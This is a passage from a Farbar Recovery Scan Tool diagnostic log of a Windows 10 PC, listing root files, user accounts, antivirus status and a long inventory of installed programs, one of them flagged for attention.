2019-10-28 22:32 - 2018-12-02 22:13 - 000000000 ____D C:\Users\SR\Documents\FIFA 19

==================== Files in the root of some directories ========

2019-08-11 17:16 - 2019-08-11 17:16 - 000137168 _____ (Mozilla Foundation) C:\ProgramData\mozglue.dll
2019-08-11 17:16 - 2019-08-11 17:16 - 001246160 _____ (Mozilla Foundation) C:\ProgramData\nss3.dll
2017-06-18 13:13 - 2019-10-20 14:44 - 000000132 ____H () C:\Users\SR\AppData\Roaming\Adobe PNG Format CC Prefs
2017-05-27 13:13 - 2017-05-27 13:13 - 000001167 ____H () C:\Users\SR\AppData\Roaming\trace_FilterInstaller.1.txt
2017-05-27 13:13 - 2017-05-29 13:58 - 000000905 ____H () C:\Users\SR\AppData\Roaming\trace_FilterInstaller.txt
2017-05-27 13:13 - 2017-05-29 13:58 - 000000000 ____H () C:\Users\SR\AppData\Roaming\trace_FilterInstaller.txt-CRT.txt
2019-06-01 18:59 - 2019-10-20 14:40 - 000001456 _____ () C:\Users\SR\AppData\Local\Adobe Save for Web 13.0 Prefs
2018-11-26 20:34 - 2019-11-16 00:19 - 000006144 _____ () C:\Users\SR\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2018-09-27 17:57 - 2018-09-27 17:57 - 000000000 _____ () C:\Users\SR\AppData\Local\oobelibMkey.log
2017-06-05 14:13 - 2017-07-14 23:32 - 000007598 _____ () C:\Users\SR\AppData\Local\Resmon.ResmonCfg
2018-03-01 13:55 - 2019-07-25 12:32 - 000001207 _____ () C:\Users\SR\AppData\Local\SuperJolt.Common.log
2018-03-01 13:55 - 2019-07-25 12:32 - 000002529 _____ () C:\Users\SR\AppData\Local\SuperJolt.Snapper.log
2017-06-10 15:40 - 2017-06-12 13:14 - 000930816 _____ () C:\Users\SR\AppData\Local\test_db_cara.db

==================== SigCheck ============================

(There is no automatic fix for files that do not pass verification.)

==================== End of FRST.txt ========================

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 24-11-2019
Ran by SR (25-11-2019 10:22:22)
Running from D:\Users\SR\Downloads
Windows 10 Pro Version 1803 17134.345 (X64) (2018-06-02 13:24:39)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-3967059023-4107875624-2872843465-500 - Administrator - Disabled) => C:\Users\Administrator
DefaultAccount (S-1-5-21-3967059023-4107875624-2872843465-503 - Limited - Disabled)
Guest (S-1-5-21-3967059023-4107875624-2872843465-501 - Limited - Enabled)
HomeGroupUser$ (S-1-5-21-3967059023-4107875624-2872843465-1006 - Limited - Enabled)
SR (S-1-5-21-3967059023-4107875624-2872843465-1001 - Administrator - Enabled) => C:\Users\SR
WDAGUtilityAccount (S-1-5-21-3967059023-4107875624-2872843465-504 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Accu-Sim 182 Skylane for FSX (HKLM-x32\...\Accu-Sim 182 Skylane for FSX) (Version:  - )
Accu-Sim Bonanza 35 for Flight Simulator X (HKLM-x32\...\{55DBEDCF-367F-449E-B90C-43416D468ED1}) (Version: 18.9.15.1 - A2A Simulations Inc.) Hidden
Accu-Sim Bonanza 35 for Flight Simulator X (HKLM-x32\...\Accu-Sim Bonanza 35 for Flight Simulator X 18.9.15.1) (Version: 19.5.24.0 - A2A Simulations Inc.)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 3.9.1.335 - Adobe Systems Incorporated)
Adobe Flash Player 32 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 32.0.0.223 - Adobe)
Adobe Photoshop CC 2015 (HKLM-x32\...\{793C2BF7-A4FE-4608-91C9-9282C5801C21}) (Version: 16.0 - Adobe Systems Incorporated)
Adobe Premiere (HKLM\...\{C1CB876C-A08E-4692-B525-42848BD154D7}) (Version: 1.0.0000 - Adobe Systems Incorporated) Hidden
Adobe Premiere Pro CC 2017 (HKLM-x32\...\PPRO_11_0_1) (Version: 11.0.1 - Adobe Systems Incorporated)
Aerosoft's - Aerosoft Launcher (HKLM-x32\...\{EE11CFFC-898C-4875-8A63-8B732A9AD43B}) (Version: 1.1.0.1 - Aerosoft)
Aerosoft's - Airbus A320-A321 - FSX STEAM Edition (HKLM-x32\...\Airbus A320-A321 - FSX STEAM Edition) (Version: 1.30 - Aerosoft)
Aerosoft's - Diamond DA20-100 Katana 4X (HKLM-x32\...\{974BF461-4D2C-448A-B05B-502AEA41B7FB}) (Version: 1.04 - Aerosoft)
aerosoft's - FlightSim Commander 9 (HKLM-x32\...\{F941AABE-E868-42D9-9F38-884250F7898A}) (Version: E: - aerosoft)
aerosoft's - Professional Flight Planner X (HKLM-x32\...\{1A5D2729-4A3B-4CD5-85C8-4896FD44B78D}) (Version: 1.15 - aerosoft)
AES Crypt (HKLM\...\{562885D3-41A7-4211-822E-B1B1510069E5}) (Version: 3.10 - Packetizer, Inc.)
Altiverb 6 (HKLM-x32\...\Altiverb 6) (Version:  - )
Apple Application Support (32-bit) (HKLM-x32\...\{5A659BE5-849B-484E-A83B-DCB78407F3A4}) (Version: 7.3 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{F8060941-C0AB-4BCE-88AC-F2FDA2E9F286}) (Version: 7.3 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{5FA8C4BE-8C74-4B9C-9B49-EBF759230189}) (Version: 12.1.0.25 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{A30EA700-5515-48F0-88B0-9E99DC356B88}) (Version: 2.6.0.1 - Apple Inc.)
Application Verifier x64 External Package (HKLM\...\{B27BC1FC-8474-9E32-73C2-6F7CD58AD1E3}) (Version: 10.1.17763.132 - Microsoft) Hidden
Application Verifier x64 External Package (HKLM\...\{F02CC6FE-37FC-3D47-F961-721D85BAF224}) (Version: 10.1.15063.674 - Microsoft) Hidden
Arena 3.5.1 (HKLM-x32\...\Arena 3.5.1_is1) (Version:  - )
ASIO4ALL (HKLM-x32\...\ASIO4ALL) (Version: 2.14 - Michael Tippach)
AudioEase Altiverb VST RTAS v6.10 (HKLM-x32\...\AudioEase Altiverb VST RTAS_is1) (Version:  - )
Autodesk Maya 2016 (HKLM\...\{3905B678-DC8D-4D5E-AA95-EA254D6C1239}) (Version: 16.0.1312.0 - Autodesk) Hidden
Autodesk Maya 2016 (HKLM\...\Autodesk Maya 2016) (Version: 16.0.1312.0 - Autodesk)
AutoHotkey 1.1.26.01 (HKLM\...\AutoHotkey) (Version: 1.1.26.01 - Lexikos)
Banished (HKLM-x32\...\1207660783_is1) (Version: 2.3.0.7 - GOG.com)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
BS.Player FREE (HKLM-x32\...\BSPlayerf) (Version: 2.72.1082 - AB Team, d.o.o.)
Camtasia 9 (HKLM\...\{B8A4CB7E-7F5B-484F-A127-E4431000EDCE}) (Version: 9.0.4.1948 - TechSmith Corporation) Hidden
Camtasia 9 (HKLM-x32\...\{5957dd25-bb4e-4234-9dc0-b3e10a70f636}) (Version: 9.0.4.1948 - TechSmith Corporation)
Camtasia Studio 8 (HKLM-x32\...\{BFA04EE0-8240-4667-8D53-45496A901C33}) (Version: 8.1.2.1327 - TechSmith Corporation)
Cheat Engine 6.7 (HKLM-x32\...\Cheat Engine 6.7_is1) (Version:  - Cheat Engine)
Cheat Engine 6.8.1 (HKLM-x32\...\Cheat Engine 6.8.1_is1) (Version:  - Cheat Engine)
ChessBase 14 (HKLM-x32\...\{EAC25C55-7C92-451B-94EE-D5BC3932A6A3}) (Version: 14.0.0.0 - ChessBase)
Chessmaster Grandmaster Edition (HKLM-x32\...\{27614800-84A9-484E-9CCB-43ED2F1205F5}) (Version: 1.00.0000 - Ubisoft) Hidden
Chessmaster Grandmaster Edition (HKLM-x32\...\InstallShield_{27614800-84A9-484E-9CCB-43ED2F1205F5}) (Version: 1.00.0000 - Ubisoft)
ClickOnce Bootstrapper Package for Microsoft .NET Framework (HKLM-x32\...\{D256A5B9-68DA-4F6C-A447-A93E5639A46D}) (Version: 4.7.03083 - Microsoft Corporation) Hidden
CloudNet (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\CloudNet) (Version: 20170301 - EpicNet Inc.) <==== ATTENTION
Deep Shredder 12 UCI (HKLM-x32\...\{14B6295D-6D03-4635-A17F-76AB10C74EF0}_is1) (Version:  - Stefan Meyer-Kahlen)
Desktop-Reminder 2 (HKLM-x32\...\{288487BA-D8C5-4C81-BD89-C7E49DD48E18}) (Version: 2.128 - Polenter - Software Solutions) Hidden
Desktop-Reminder 2 (HKLM-x32\...\Desktop-Reminder 2) (Version: 2.128 - Polenter - Software Solutions)
DiagnosticsHub_CollectionService (HKLM\...\{440C5592-4EA5-4772-B256-969D66068843}) (Version: 15.9.28016 - Microsoft Corporation) Hidden
DiskProtect190001 version 19.01 (HKLM-x32\...\{6EE85A71-720C-4C73-8920-9BE5B5BF803D}_is1) (Version: 19.01 - )
DisplayDriverAnalyzer (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_DisplayDriverAnalyzer) (Version: 397.93 - NVIDIA Corporation) Hidden
Dropbox (HKLM-x32\...\Dropbox) (Version: 85.4.155 - Dropbox, Inc.)
Dropbox Update Helper (HKLM-x32\...\{099218A5-A723-43DC-8DB5-6173656A1E94}) (Version: 1.3.241.1 - Dropbox, Inc.) Hidden
EaseUS MobiMover 4.5 (HKLM-x32\...\EaseUS MobiMover_is1) (Version:  - EaseUS)
E-muPatchMix DSP (HKLM-x32\...\EMU PatchMix DSP) (Version:  - )
Entity Framework 6.2.0 Tools  for Visual Studio 2017 (HKLM-x32\...\{B843915F-00A1-44B1-994C-1AE0A6400AE3}) (Version: 6.2.61807.0 - Microsoft Corporation) Hidden
EPSON L130 Series Printer Uninstall (HKLM\...\EPSON L130 Series) (Version:  - SEIKO EPSON Corporation)
Epson Software Updater (HKLM-x32\...\{7BAC3F7A-B963-468E-982E-B5608A87408D}) (Version: 4.4.4 - SEIKO EPSON CORPORATION)
Equalizer APO (HKLM\...\EqualizerAPO) (Version: 1.2 - )
eReg (HKLM-x32\...\{3EE9BCAE-E9A9-45E5-9B1C-83A4D357E05C}) (Version: 1.20.138.34 - Logitech, Inc.) Hidden
FIFA 19 (HKLM-x32\...\{3391E07D-8484-4124-817E-FCBDA859FD62}) (Version: 1.0.58.64628 - Electronic Arts)
FileMaker Pro 16 (HKLM-x32\...\{13552F4B-487E-49C0-9DCB-A6A3DC74110C}) (Version: 16.0.4.403 - FileMaker, Inc.) Hidden
FileMaker Pro 16 (HKLM-x32\...\{13552F4B-487E-49C0-9DCB-A6A3DC74110C}_FileMaker) (Version: 16.0.4.403 - FileMaker, Inc.)
Finale (HKLM\...\{48133FCD-8D55-4D52-A668-D1A988FC00C4}) (Version: 25.0.0.6858 - MakeMusic)
Flight One Software - GTN Series (HKLM-x32\...\F1T182T) (Version: 1.23 - Flight One Software)
FLT 7.0v2 (HKLM-x32\...\FLT 7.0v2_is1) (Version:  - The Foundry)
FMRTE 17.3.1.17 (HKLM\...\{72A84F14-6742-48AD-9B14-E9C1BE155F7A}_is1) (Version: 17.3.1.17 - FMRTE)
FMRTE 18.3.3.26 (HKLM\...\{DDBB4759-2DD1-4003-91B0-219DEF70DF13}_is1) (Version: 18.3.3.26 - FMRTE)
Folder Size (64-bit) (HKLM\...\{F24FF688-7138-4CCF-A83F-71E9FB01170E}) (Version: 2.6 - Brio)
Football Manager 2017 (HKLM\...\Football Manager 2017_is1) (Version: 1.0 - )
Football Manager 2017 Editor (HKLM\...\Football Manager 2017 Editor_is1) (Version: 1.0 - )
Football Manager 2018 (HKLM-x32\...\Football Manager 2018_is1) (Version:  - )
Garmin Aviation Checklist Editor (HKLM-x32\...\{51B555C4-F02B-44A5-8710-8EFE8FCB0589}) (Version: 2.3.0.0 - Garmin Ltd or its subsidiaries)
Garmin GTN Trainer (HKLM-x32\...\{FE8823C2-815A-493B-B3A4-DC2C20268AE8}) (Version: 6.21.0 - Garmin)
Global Prime - MetaTrader 4 (HKLM-x32\...\Global Prime - MetaTrader 4) (Version: 4.00 - MetaQuotes Software Corp.)
Google Earth Pro (HKLM\...\{70A0F34E-564B-4F93-ADD6-3BAEC6E44075}) (Version: 7.3.2.5776 - Google)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.34.11 - Google LLC) Hidden
Greenshot 1.2.10.6 (HKLM\...\Greenshot_is1) (Version: 1.2.10.6 - Greenshot)
Gtk# for .Net 2.12.26 (HKLM-x32\...\{BC25B808-A11C-4C9F-9C0A-6682E47AAB83}) (Version: 2.12.26 - Xamarin, Inc.)
HD Tune Pro 5.50 (HKLM-x32\...\HD Tune Pro_is1) (Version:  - EFD Software)
icecap_collection_neutral (HKLM-x32\...\{A3B4D258-74E1-49D6-9A86-2DFEFEE48DEC}) (Version: 15.8.27906 - Microsoft Corporation) Hidden
icecap_collection_x64 (HKLM\...\{E524832A-C567-499A-8872-0D79596E4DEE}) (Version: 15.8.27906 - Microsoft Corporation) Hidden
icecap_collectionresources (HKLM-x32\...\{469961DF-482F-4213-ACD4-4AFD443F2A88}) (Version: 15.8.27924 - Microsoft Corporation) Hidden
icecap_collectionresourcesx64 (HKLM-x32\...\{12246E9A-D1A6-4D96-8CEA-CCFD064B16E2}) (Version: 15.8.27924 - Microsoft Corporation) Hidden
Icon Shepherd (HKLM\...\Icon Shepherd_is1) (Version: 19.10.2 - WinAbility Software Corp.)
IDM Crack 6.25 build 25 (HKLM-x32\...\IDM Crack 6.25 build 25) (Version: 5.40 - Crackingpatching.com Team)
InputMapper (HKLM-x32\...\{026D2025-A7FA-4F5C-AF8C-A6F7A9B917FC}) (Version: 1.6.10.19991 - DSDCS)
InputMapper HidGuardian (HKLM-x32\...\{3753F0EF-7F58-4BBA-B4EA-9E1B83C13B97}) (Version: 1.0.6320.17641 - DSDCS)
Intellisense Lang Pack Mobile Extension SDK 10.0.15063.0 (HKLM-x32\...\{87A8879A-3189-4E81-8D1A-0467301C5049}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
IntelliTraceProfilerProxy (HKLM-x32\...\{ACBAA378-519A-441D-9349-C0AAD8DEAD04}) (Version: 15.0.17289.01 - Microsoft Corporation) Hidden
iTools 3 (HKLM-x32\...\ThinkSky) (Version:  - Shenzhen Thinksky Technology Co., Ltd.)
iTunes (HKLM\...\{D9D08A8F-5A03-486A-AD4D-3A438D521F8B}) (Version: 12.9.3.3 - Apple Inc.)
iZotope RX 5 (HKLM-x32\...\iZotope RX 5_is1) (Version: 5.01 - iZotope, Inc.)
Java 8 Update 231 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180231F0}) (Version: 8.0.2310.11 - Oracle Corporation)
Java 8 Update 60 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86418060F0}) (Version: 8.0.600.27 - Oracle Corporation)
Java SE Development Kit 8 Update 60 (64-bit) (HKLM\...\{64A3A4F4-B792-11D6-A78A-00B0D0180600}) (Version: 8.0.600.27 - Oracle Corporation)
Kits Configuration Installer (HKLM-x32\...\{971E24EB-1096-64A5-10C0-7FD2D3774669}) (Version: 10.1.15063.674 - Microsoft) Hidden
Landing Rate Monitor (HKLM-x32\...\{B946315D-F716-492B-B914-718BC9A5D6D4}_is1) (Version: 4.0.0 - Bobby Allen)
Lexikon Sonate version 5.0 (HKLM-x32\...\Lexikon Sonate_is1) (Version: 5.0 - )
LLH5X (HKLM-x32\...\LLH5X) (Version:  - )
LLH7X (HKLM-x32\...\LLH7X) (Version:  - )
LLH8X (HKLM-x32\...\LLH8X) (Version:  - )
LLH-Heli (HKLM-x32\...\LLH-Heli) (Version:  - )
Logitech Options (HKLM\...\LogiOptions) (Version: 6.90.131 - Logitech)
Logitech SetPoint 6.69 (HKLM\...\sp6) (Version: 6.69.123 - Logitech)
loopMIDI (HKLM-x32\...\{55c0d955-4cee-452c-b393-d4c020a967d7}) (Version: 1.0.13.24 - Tobias Erichsen)
loopMIDI (HKLM-x32\...\{9E69C6CD-820A-44A9-9A0A-B7A56AD62A1E}) (Version: 1.0.13.24 - Tobias Erichsen) Hidden
loopMIDIBlockLegacy (HKLM-x32\...\{AEAF7978-3204-451D-8593-BC53EBDDA31D}) (Version: 9.9.9.9 - Tobias Erichsen) Hidden
Macro Recorder 5.7.1 (HKLM-x32\...\Macro Recorder_is1) (Version: 5.7.1 - Jitbit Software)
Malwarebytes version 4.0.4.49 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 4.0.4.49 - Malwarebytes)
Mari 2.5v2 (HKLM\...\Mari 2.5v2_is1) (Version:  - The Foundry)
Max 7 (64-bit) (HKLM\...\{AB97A2FF-BA6F-4B15-8032-FF9A331AFF77}) (Version: 7.0.3 - Cycling '74)
MaxScore (HKLM-x32\...\MaxScore 0.8.41) (Version: 0.8.41 - maxscore)
MayaBonusTools (HKLM\...\{367B88BA-C90B-A1D3-81BA-7C5407698472}) (Version: 17.0.1 - Autodesk, Inc.)
Melodyne 3.1 (HKLM-x32\...\{9D623E1A-30E1-4E55-BD80-5C1359DB120B}) (Version: 3.1.0200 - Celemony Software GmbH) Hidden
Melodyne 3.1 (HKLM-x32\...\{A1F143D1-1F0D-44FB-A44B-71D4367D16DE}) (Version: 3.1.0200 - Celemony Software GmbH)
mental ray renderer for Autodesk Maya 2016 (HKLM\...\{59AC9438-6EE3-4B22-860F-525308329228}) (Version: 16.0.1312.0 - mental ray)
MetaStock 11.0 (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\MetaStock 11.0) (Version:  - )
Microsoft .NET Core SDK 2.1.509 (x64) (HKLM-x32\...\{305c8a42-62c1-4b59-b53f-09a9f066fd44}) (Version: 2.1.509 - Microsoft Corporation)
Microsoft Flight Simulator SimConnect Client v10.0.60905.0 (HKLM-x32\...\{D1AC9B0B-2727-4811-91DC-1FC3C4E47A9B}) (Version: 10.0.60905.0 - Microsoft Corporation)
Microsoft Flight Simulator SimConnect Client v10.0.61242.0 (HKLM-x32\...\{85DF6786-66AA-42EE-8616-AE456B07BD99}) (Version: 10.0.61242.0 - Microsoft Corporation)
Microsoft Flight Simulator SimConnect Client v10.0.61259.0 (HKLM-x32\...\{D61CA184-3F6D-4A50-B2CC-7A18447D6A8D}) (Version: 10.0.61259.0 - Microsoft Corporation)
Microsoft Flight Simulator X Steam Edition (HKLM-x32\...\Microsoft Flight Simulator X Steam Edition_is1) (Version:  - )
Microsoft Office Professional Plus 2016 - el-gr (HKLM\...\ProplusRetail - el-gr) (Version: 16.0.12228.20250 - Microsoft Corporation)
Microsoft Office Professional Plus 2016 - en-us (HKLM\...\ProplusRetail - en-us) (Version: 16.0.12228.20250 - Microsoft Corporation)
Microsoft OneDrive (HKU\.DEFAULT\...\OneDriveSetup.exe) (Version: 18.151.0729.0013 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\OneDriveSetup.exe) (Version: 19.202.1013.0006 - Microsoft Corporation)
Microsoft SQL Server 2012 Express LocalDB  (HKLM\...\{E75776B2-EAE5-42F9-A800-0A10763DEDF0}) (Version: 11.0.2318.0 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server vNext CTP1.6 (HKLM\...\{98DD6908-C582-452A-954D-E79E6DF0310A}) (Version: 15.0.600.33 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server vNext CTP1.6 (HKLM-x32\...\{640EECB8-1962-4D23-ACB2-310107EC7ED9}) (Version: 15.0.600.33 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (HKLM\...\{350AA351-21FA-3270-8B7A-835434E766AD}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{9634d50a-0c4d-4f52-8a9f-894a2baae370}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{307a22b8-8353-4c5e-b67b-2404c5734558}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40660 (HKLM-x32\...\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}) (Version: 12.0.40660.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.16.27033 (HKLM-x32\...\{cc3a7c63-31fb-4129-9024-63ebefd86a95}) (Version: 14.16.27033.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.16.27033 (HKLM-x32\...\{624ba875-fdfc-4efa-9c66-b170dfebc3ec}) (Version: 14.16.27033.0 - Microsoft Corporation)
Microsoft Visual Studio Installer (HKLM\...\{6F320B93-EE3C-4826-85E0-ADF79F8D4C61}) (Version: 1.18.1104.625 - Microsoft Corporation)
MMFonts (HKLM-x32\...\{1DD5D3E6-8DF5-4657-8825-713C499CDCC0}) (Version: 1.1.1.1 - MakeMusic, Inc.)
Mozilla Firefox 61.0.2 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 61.0.2 (x86 en-US)) (Version: 61.0.2 - Mozilla)
Mozilla Firefox 70.0.1 (x64 en-US) (HKLM\...\Mozilla Firefox 70.0.1 (x64 en-US)) (Version: 70.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 64.0.2 - Mozilla)
Mp3tag v2.84a (HKLM-x32\...\Mp3tag) (Version: 2.84a - Florian Heidenreich)
MSI Development Tools (HKLM-x32\...\{577FB968-1AAC-A315-93D6-419725A69F36}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
MSI Development Tools (HKLM-x32\...\{6C961B30-A670-8A05-3BFE-3947E84DD4E4}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation)
Native Instruments Kontakt 5 (HKLM-x32\...\Native Instruments Kontakt 5) (Version: 5.7.3.37 - Native Instruments)
Network Addon Mod (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Network Addon Mod) (Version: 36 - The NAM Team)
Notepad++ (32-bit x86) (HKLM-x32\...\Notepad++) (Version: 7.5.8 - Notepad++ Team)
NovaGOPlayer 7.3.3 (HKLM-x32\...\89399A59-11C3-4EBC-A59E-FBD13021BC07_is1) (Version: 7.3.3 - Forthnet Media SA)
NVAPI Monitor plugin for NvContainer (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NvContainer.NvapiMonitor) (Version: 1.15 - NVIDIA Corporation) Hidden
NVIDIA 3D Vision Controller Driver 390.41 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 390.41 - NVIDIA Corporation)
NVIDIA 3D Vision Driver 397.93 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 397.93 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.19.0.94 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.19.0.94 - NVIDIA Corporation)
NVIDIA Graphics Driver 397.93 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 397.93 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.37.4 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.37.4 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.17.0524 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.17.0524 - NVIDIA Corporation)
OANDA - MetaTrader (HKLM-x32\...\OANDA - MetaTrader) (Version: 4.00 - MetaQuotes Software Corp.)
OANDA Desktop (HKLM-x32\...\{1DAF3BB8-E27F-4698-9D7C-270985AA3BCE}) (Version: 2.6.3 - OANDA)
Office 16 Click-to-Run Extensibility Component (HKLM-x32\...\{90160000-008C-0000-0000-0000000FF1CE}) (Version: 16.0.12228.20250 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component 64-bit Registration (HKLM\...\{90160000-00DD-0000-1000-0000000FF1CE}) (Version: 16.0.12228.20250 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-008F-0000-1000-0000000FF1CE}) (Version: 16.0.12228.20250 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0408-0000-0000000FF1CE}) (Version: 16.0.12228.20250 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0409-0000-0000000FF1CE}) (Version: 16.0.12228.20250 - Microsoft Corporation) Hidden
PACE License Support Win64 (HKLM\...\{72ad9d51-0903-4fe7-af5d-33b3185fa6e9}) (Version: 2.4.2.0737 - PACE Anti-Piracy, Inc.) Hidden
PACE License Support Win64 (HKLM-x32\...\InstallShield_{72ad9d51-0903-4fe7-af5d-33b3185fa6e9}) (Version: 2.4.2.0737 - PACE Anti-Piracy, Inc.)
PCM Native Reverb VST Plug-in (HKLM-x32\...\{B4691C58-2A6A-4AFA-960E-AEB767639E44}) (Version: 1.0.0 - Lexicon) Hidden
PCM Native Reverb VST Plug-in (HKLM-x32\...\PCM Native Reverb VST Plug-in) (Version:  - Lexicon)
PDFCreator (HKLM\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 2.5.2 - pdfforge GmbH)
